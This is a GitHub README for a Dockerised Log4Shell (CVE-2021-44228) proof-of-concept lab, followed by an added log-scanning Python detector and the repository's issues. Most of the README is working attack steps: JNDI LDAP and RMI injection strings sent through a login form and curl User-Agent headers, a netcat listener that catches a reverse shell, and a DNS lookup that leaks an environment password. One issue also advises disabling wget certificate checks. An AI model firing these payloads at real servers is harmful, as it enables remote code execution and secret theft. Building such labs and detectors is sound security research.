log4j-poc

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

Description

The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it, and the server is also vulnerable via User-Agent header attacks.

The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc

This demo Tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigured to use Log4J2 for logging, which is a non-standard configuration.

A newer Bitnami server is now available on port 8888. It is also configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.

The RMI exploit against the Tomcat 9 / Java 11 server is described in this post by Michael Stepankin (Jan 3, 2019): https://www.veracode.com/blog/research/exploiting-jndi-injections-java

The detection script checks for User-Agent vulnerabilities and is taken from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Prerequisites

This code requires Docker and Docker Compose.

Installation

git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to adjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener, e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener.
# This can be the local IP of the docker host machine.
docker-compose build

Run Web App Attack Demo

  1. Set up your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. Navigate to the web app on port 8080
    1. Navigate to http://10.10.10.31:8080/log4shell
      1. Enter the username: admin
      2. Enter the password: password
      3. Select the "login" button
      4. See the welcome screen
    2. Return to login at http://10.10.10.31:8080/log4shell
      1. Enter the username ${jndi:ldap://172.16.238.11:1389/a}
      2. Select the "login" button
      3. Check for connection on your nc listener

Run a User Agent Attack Demo

  1. Set up your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. In a third terminal, run the following. The second IP is the docker host.
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

Run a DNS Exfil Demo on the Recent Java 11 Version

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the IP address of the docker host.
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. The vulnerable web server will attempt a DNS TXT lookup against the given IP. See log4j-dns_exfil.pcap.

Run an RMI RCE Demo on the Recent Java 11 Version

I am having issues with the command line arg for the ping target, so you have to compile it yourself.

Compile

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In another terminal, log in to the cve-poc container
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. Kill the running RMIServerPOC instance
  4. Change to rmi-poc directory
    1. cd /home/user/rmi-poc
  5. Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
  6. Recompile
    1. javac -cp catalina.jar:. RMIServerPOC.java
  7. Run the Server
    1. java -cp catalina.jar:. RMIServerPOC 127.0.0.1

Run RMI RCE Demo

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the IP address of the docker host.
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. The vulnerable web server will download a malicious serialized object from the RMI server, of a class that already exists in the Tomcat environment.
  4. This will ping the IP address configured in the Compile section.

Detect UA Vulnerability

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. You will have to kill the process; I am not sure yet why it hangs.
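As an added defender-side example (not part of this project or its scripts), the following Python scans Tomcat access log lines for the ${jndi:...} lookup strings used in the demos above, percent-decoding each line first and flagging nested lookups such as ${env:...} that would leak a variable over DNS. The log lines are constructed for this example and assume the "combined" format with the User-Agent as the last quoted field.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat "combined"-format access log lines (not captured from this project);
# the User-Agent is the last quoted field. Lines 2-4 carry the lookup strings from the
# demos above; line 5 carries a percent-encoded copy of the LDAP one in the query string.
SAMPLE_LOG = """\
10.10.10.31 - - [06/Feb/2022:13:45:18 +0000] "GET /log4shell HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.10.31 - - [06/Feb/2022:13:46:02 +0000] "GET /log4shell HTTP/1.1" 200 512 "-" "${jndi:ldap://172.16.238.11:1389/a}"
10.10.10.31 - - [06/Feb/2022:13:47:10 +0000] "GET /log4shell/ HTTP/1.1" 200 512 "-" "${jndi:dns://10.10.10.31/${env:POC_PASSWORD}}"
10.10.10.31 - - [06/Feb/2022:13:48:33 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://172.16.238.11:1097/Object}"
10.10.10.31 - - [06/Feb/2022:13:49:00 +0000] "GET /log4shell?u=%24%7Bjndi%3Aldap%3A%2F%2F172.16.238.11%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.81.0"
"""

# ${jndi:<scheme>://<host>[:<port>]<path>; the host ends at '/', ':' or '}'.
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}$\s"]+)(?::(?P<port>\d+))?(?P<path>[^\s"]*)',
    re.IGNORECASE)
# A further ${name:...} lookup nested in the target, e.g. ${env:POC_PASSWORD}.
NESTED_RE = re.compile(r"\$\{(\w+:[^}]*)\}")


def find_jndi_lookups(text):
    """Return one dict per JNDI lookup in text; percent-decode first so encoded forms match."""
    return [{"scheme": m.group("scheme").lower(),
             "host": m.group("host"),
             "port": int(m.group("port")) if m.group("port") else None,
             "nested": NESTED_RE.findall(m.group("path"))}
            for m in JNDI_RE.finditer(unquote(text))]


def classify(finding):
    """Describe what a successful lookup would do, for the alert text."""
    if finding["nested"]:
        return "leaks %s via %s" % (", ".join(finding["nested"]), finding["scheme"])
    if finding["scheme"] in ("ldap", "ldaps", "rmi"):
        return "remote class/object load via %s" % finding["scheme"]
    return "outbound callback via %s" % finding["scheme"]


def scan_access_log(log_text):
    """Return an alert dict (with line number and verdict) per JNDI lookup in the log."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for finding in find_jndi_lookups(line):
            finding.update(line=lineno, verdict=classify(finding))
            alerts.append(finding)
    return alerts
```

Run scan_access_log(SAMPLE_LOG) to get one alert per malicious line; the first, clean line produces none.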

log4j-poc's People

Contributors

cyberxml


log4j-poc's Issues

Must change source code "cve-poc/Dockerfile" to build this project!!

FROM codenvy/jdk8_maven3_tomcat8

COPY --chown=user:user files /

USER root

RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 648ACFD622F3D138
RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 0E98404D386FA1D9
RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys DCC9EFBF77E11517

RUN echo "deb http://deb.debian.org/debian/ buster main" > /etc/apt/sources.list
RUN echo "deb-src http://deb.debian.org/debian/ buster main" >> /etc/apt/sources.list

RUN sudo apt-get -y remove binutils
RUN sudo apt-get update && sudo apt-get -y install python3 netcat vim tcpdump

USER user

WORKDIR /home/user

RUN cd rmi-poc && \
    javac -cp catalina.jar:. RMIServerPOC.java

EXPOSE 22/tcp

CMD ["/entrypoint.sh"]

cve-neo: build Dockerfile http 503 Error : wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

wget Error 503
wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz
--2022-02-06 13:45:18-- https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz
Resolving dlcdn.apache.org (dlcdn.apache.org)... 151.101.2.132, 2a04:4e42::644
Connecting to dlcdn.apache.org (dlcdn.apache.org)|151.101.2.132|:443... connected.
HTTP request sent, awaiting response...
HTTP/1.1 503 Backend unavailable, connection timeout

Solution: change to downloads.apache.org: RUN wget https://downloads.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

wget call in Dockerfile should use --no-check-certificate

Dockerfile for cve-web includes a wget call to archive.apache.org. This is causing an error:

0.888 ERROR: The certificate of 'archive.apache.org' is not trusted.
0.888 ERROR: The certificate of 'archive.apache.org' hasn't got a known issuer.

To get around this, use wget --no-check-certificate https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.3/bin/apache-tomcat-8.5.3.tar.gz instead.

Missing packet capture for RMI exploit

I noticed you didn't have an example packet capture of a successful RMI exploit, so I've attached one to this issue.

The relevant data is:

  • TCP stream 0: HTTP request with malicious lookup string in the user agent header
  • TCP stream 1: RMI initialization (?)
  • TCP stream 2: Malicious serialized Java object
  • TCP stream 3: Reverse shell communication

rmi_exploit.pcap.zip
